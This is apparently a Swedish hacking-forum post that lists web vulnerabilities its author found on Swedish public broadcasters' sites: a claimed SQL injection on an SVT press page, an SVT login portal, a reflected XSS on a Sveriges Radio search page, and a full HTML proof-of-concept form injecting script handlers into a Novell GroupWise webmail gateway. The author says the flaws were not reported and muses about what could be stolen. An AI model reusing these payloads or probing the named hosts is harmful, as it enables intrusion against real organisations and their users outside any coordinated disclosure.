SVT:
1
När man väl är inloggad kan man köra
SQL injektion lite här och där har väl funderat på att kontakta dem om det, men det har inte känts så kul.
http://www.pressinfo.svt.se/app/pres...word=bild2d6Ch
2
Är inget egentligt hack tyckte bara sidan var intressant.
https://distans.svt.se/dana-na/auth/...lt/welcome.cgi
Sverigesradio:
1
Har inte hittat något speciellt kul att sno med det här Xss felet. Men jag ser potential.
http://sverigesradio.se/sida/SokResu...programid=2445
2
Riktigt farligt XSS Fel går att använda på
Tusentals sidor. Man tycker ju ändå att novel borde kunna lite.
Kod:
<html>
<body >
<form action="http://mailgw.sr.se/gw/webpub?User.lang=sv&merge=caption" method="post">
<input type="text" value="xss"</style></head><body onmousemove ="try{if(AwQ)AwQ=1;}catch(e){AwQ=1;alert(1);}" onload="try{if(A wQ)AwQ=1;}catch(e){AwQ=1;alert(1);}">a</body></html><!--" name="User.context">
<input type="submit">
</form>
</body>
</html>